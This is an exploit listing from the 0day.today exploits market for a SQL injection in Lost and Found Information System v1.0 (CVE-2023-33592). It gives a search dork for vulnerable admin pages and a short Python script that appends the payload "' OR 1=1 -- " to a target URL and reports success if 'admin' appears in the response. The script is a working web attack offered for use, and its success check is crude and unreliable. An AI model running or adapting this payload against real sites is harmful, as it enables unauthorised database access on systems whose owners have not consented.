[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Lost and Found Information System v1.0 - SQL Injection Exploit

Author
Amirhossein Bahramizadeh
Risk
[
Security Risk High
]
0day-ID
0day-ID-38851
Category
web applications
Date add
06-07-2023
CVE
CVE-2023-33592
Platform
php
# Exploit Title: Lost and Found Information System v1.0 - SQL Injection
# country: Iran
# Exploit Author: Amirhossein Bahramizadeh
# Category : webapps
# Dork : /php-lfis/admin/?page=system_info/contact_information
# Tested on: Windows/Linux
# CVE : CVE-2023-33592
import requests

# URL of the vulnerable component
url = "http://example.com/php-lfis/admin/?page=system_info/contact_information"

# Injecting a SQL query to exploit the vulnerability
payload = "' OR 1=1 -- "

# Send the request with the injected payload
response = requests.get(url + payload)

# Check if the SQL injection was successful
if "admin" in response.text:
    print("SQL injection successful!")
else:
    print("SQL injection failed.")

#  0day.today [2024-11-15]  #